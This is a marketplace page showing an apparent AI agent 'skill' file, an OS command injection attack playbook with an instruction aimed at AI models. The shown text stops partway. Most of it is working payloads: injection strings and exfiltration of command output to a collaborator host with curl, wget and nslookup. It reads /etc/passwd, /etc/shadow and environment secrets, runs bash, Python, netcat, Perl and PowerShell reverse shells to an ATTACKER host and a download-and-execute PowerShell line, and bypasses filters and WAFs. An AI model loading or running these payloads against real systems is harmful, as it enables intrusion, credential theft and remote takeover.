Skip to main content

cmdi-command-injection

Command injection playbook. Use when user input may reach shell commands, process execution, converters, import pipelines, or blind out-of-band command sinks.

Ir para a instalação

Informações da origem

Repositório
Kur1sulab/blackbox
Última atividade na origem
12 de agosto de 2026 às 15:17
Idioma detectado do SKILL.md
inglês
Estrelas
2
Forks
0

Opções de instalação

Por padrão, está selecionado o prompt que primeiro revisa a origem. Você pode mudar para um comando direto ou baixar uma cópia local.

Revise os arquivos de origem

Leia o SKILL.md e os arquivos complementares exibidos pelo SkillsMP antes de decidir se vai instalar.

Exibindo SKILL.md

SKILL.md
Instruções da origem · Visualização somente leitura
name
cmdi-command-injection
description
Command injection playbook. Use when user input may reach shell commands, process execution, converters, import pipelines, or blind out-of-band command sinks.
# SKILL: OS Command Injection — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors. ## 0. RELATED ROUTING Before going deep, you can first load: - upload insecure files when the shell sink is part of a broader upload, import, or conversion workflow ### First-pass payload families | Context | Start With | Backup | |---|---|---| | generic shell separator | `;id` | `&&id` | | quoted argument | `";id;"` | `';id;'` | | blind timing | `;sleep 5` | `& timeout /T 5 /NOBREAK` | | command substitution | `$(id)` | `` `id` `` | | out-of-band DNS | `;nslookup token.collab` | Windows `nslookup` variant | ```text cat$IFS/etc/passwd {cat,/etc/passwd} %0aid ``` --- ## 1. SHELL METACHARACTERS (INJECTION OPERATORS) These characters break out of the command context and inject new commands: | Metacharacter | Behavior | Example | |---|---|---| | `;` | Runs second command regardless | `dir; whoami` | | `\|` | Pipes stdout to second command | `dir \| whoami` | | `\|\|` | Run second only if first FAILS | `dir \|\| whoami` | | `&` | Run second in background (or sequenced in Windows) | `dir & whoami` | | `&&` | Run second only if first SUCCEEDS | `dir && whoami` | | `$(cmd)` | Command substitution | `echo $(whoami)` | | `` `cmd` `` | Command substitution (backtick) | `` echo `whoami` `` | | `>` | Redirect stdout to file | `cmd > /tmp/out` | | `>>` | Append to file | `cmd >> /tmp/out` | | `<` | Read file as stdin | `cmd < /etc/passwd` | | `%0a` | Newline character (URL-encoded) | `cmd%0awhoami` | | `%0d%0a` | CRLF | Multi-command injection | --- ## 2. COMMON VULNERABLE CODE PATTERNS ### PHP ```php $dir = $_GET['dir']; $out = shell_exec("du -h /var/www/html/" . $dir); // Inject: dir=../ ; cat /etc/passwd // Inject: dir=../ $(cat /etc/passwd) exec("ping -c 1 " . $ip); // $ip = "127.0.0.1 && cat /etc/passwd" system("convert " . $file); // ImageMagick RCE passthru("nslookup " . $host); // $host = "x.com; id" ``` ### Python ```python import os os.system("curl " + url) # url = "x.com; id" subprocess.call("ls " + path, shell=True) # shell=True is the key vulnerability os.popen("ping " + host) ``` ### Node.js ```javascript const { exec } = require('child_process'); exec('ping ' + req.query.host, ...); // host = "x.com; id" ``` ### Perl ```perl $dir = param("dir"); $command = "du -h /var/www/html" . $dir; system($command); // Inject dir field: | cat /etc/passwd ``` ### ASP (Classic) ```vb szCMD = "type C:\logs\" & Request.Form("FileName") Set oShell = Server.CreateObject("WScript.Shell") oShell.Run szCMD // Inject FileName: foo.txt & whoami > C:\inetpub\wwwroot\out.txt ``` --- ## 3. BLIND COMMAND INJECTION — DETECTION When response shows no command output: ### Time-Based Detection ```bash # Linux: ; sleep 5 | sleep 5 $(sleep 5) `sleep 5` & sleep 5 & # Windows: & timeout /T 5 /NOBREAK & ping -n 5 127.0.0.1 & waitfor /T 5 signal777 ``` Compare response time without payload vs with payload. 5+ second delay = confirmed. ### OOB via DNS ```bash # Linux: ; nslookup BURP_COLLAB_HOST ; host `whoami`.BURP_COLLAB_HOST $(nslookup $(whoami).BURP_COLLAB_HOST) # Windows: & nslookup BURP_COLLAB_HOST & nslookup %USERNAME%.BURP_COLLAB_HOST ``` ### OOB via HTTP ```bash # Linux: ; curl http://BURP_COLLAB_HOST/`whoami` ; wget http://BURP_COLLAB_HOST/$(id|base64) # Windows: & powershell -c "Invoke-WebRequest http://BURP_COLLAB_HOST/$(whoami)" ``` ### OOB via Out-of-Band File ```bash ; id > /var/www/html/RANDOM_FILE.txt # Then access: https://target.com/RANDOM_FILE.txt ``` --- ## 4. INJECTION CONTEXT VARIATIONS ### Within Quoted String ```bash command "INJECT" # Inject: " ; id ; " # Result: command "" ; id ; "" ``` ### Within Single-Quoted String ```bash command 'INJECT' # Inject: '; id;' # Result: command ''; id;'' ``` ### Within Backtick Execution ```bash output=`command INJECT` # Inject: x`; id ;` ``` ### File Path Context ```bash cat /var/log/INJECT # Inject: ../../../etc/passwd (path traversal) # Inject: access.log; id (command injection) ``` --- ## 5. PAYLOAD LIBRARY ### Information Gathering ```bash ; id # current user ; whoami # user name ; uname -a # OS info ; cat /etc/passwd # user list ; cat /etc/shadow # password hashes (if root) ; ls /home/ # home directories ; env # environment variables (DB creds, API keys!) ; printenv # same ; cat /proc/1/environ # process environment ; ifconfig # network interfaces ; cat /etc/hosts # host entries ``` ### Reverse Shells (Linux) ```bash # Bash: ; bash -i >& /dev/tcp/ATTACKER/4444 0>&1 ; bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1' # Python: ; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' # Netcat (with -e): ; nc ATTACKER 4444 -e /bin/bash # Netcat (without -e / OpenBSD): ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER 4444 >/tmp/f # Perl: ; perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` ### Reverse Shells (Windows via PowerShell) ```powershell & powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')" & powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` --- ## 6. FILTER BYPASS TECHNIQUES ### Space Alternatives (when space is filtered) ```bash cat</etc/passwd # < instead of space {cat,/etc/passwd} # brace expansion cat$IFS/etc/passwd # $IFS variable (field separator) X=$'\x20'&&cat${X}/etc/passwd # hex encoded space ``` ### Slash Alternatives (when `/` is filtered) ```bash $'\057'etc$'\057'passwd # octal representation cat /???/???sec??? # glob expansion ``` ### Keyword Bypass via Variable Assembly ```bash a=c;b=at;c=/etc/passwd; $a$b $c # 'cat /etc/passwd' c=at;ca$c /etc/passwd # cat ``` ### Newline Injection ``` cmd%0Aid%0Awhoami # URL-encoded newlines cmd$'\n'id$'\n'whoami # literal newlines ``` --- ## 7. COMMON INJECTION ENTRY POINTS | Entry | Example | |---|---| | Network tools | ping, nslookup, traceroute, whois forms | | File conversion | image resize, PDF generate, format convert | | Email senders | From address, name fields in notification emails | | Search/sort parameters | Passed to grep, find, sort commands | | Log viewing | Passed to tail, grep commands | | Custom script execution | "Run test" features, CI/CD hooks | | DNS lookup features | rDNS lookup, WHOIS query | | Backup/restore features | File path parameters | | Archive processing | zip/unzip, tar with user-provided filename | --- ## 8. BLIND INJECTION DECISION TREE ``` Found potential injection point? ├── Try basic: ; sleep 5 │ └── Response delays? → Confirmed blind injection │ ├── Extract data via timing: if/then sleep │ └── Use OOB: curl/nslookup to Collaborator │ ├── No delay observed? │ ├── Try: | sleep 5 │ ├── Try: $(sleep 5) │ ├── Try: ` sleep 5 ` │ ├── Try after URL encoding: %3B%20sleep%205 │ └── Try double encoding: %253B%2520sleep%25205 │ └── All blocked → check WEB APPLICATION LAYER Filter on input? → encode differently Filter on specific commands? → whitespace bypass, $IFS, glob ``` --- ## 9. ADVANCED WAF BYPASS TECHNIQUES ### Wildcard Expansion ```bash # Use ? and * to bypass keyword filters: /???/??t /???/p??s?? # /bin/cat /etc/passwd /???/???/????2 *.php # /usr/bin/find2 *.php (approximate) # Globbing for specific files: cat /e?c/p?sswd cat /e*c/p*d ``` ### cat Alternatives (when "cat" is filtered) ```bash tac /etc/passwd # reverse cat nl /etc/passwd # numbered lines head /etc/passwd tail /etc/passwd more /etc/passwd less /etc/passwd sort /etc/passwd uniq /etc/passwd rev /etc/passwd | rev xxd /etc/passwd strings /etc/passwd od -c /etc/passwd base64 /etc/passwd # then decode offline ``` ### Comment Insertion (PHP specific) ```bash # Insert comments within function names to bypass WAF: sys/*x*/tem('id') # PHP ignores /* */ in some eval contexts # Note: this works with eval() and similar PHP dynamic calls ``` ### XOR String Construction (PHP) ```php # Build function names from XOR of printable characters:
Ver no GitHub
Este SKILL.md e muito grande, entao o SkillsMP mostra aqui apenas a primeira secao. Ver no GitHub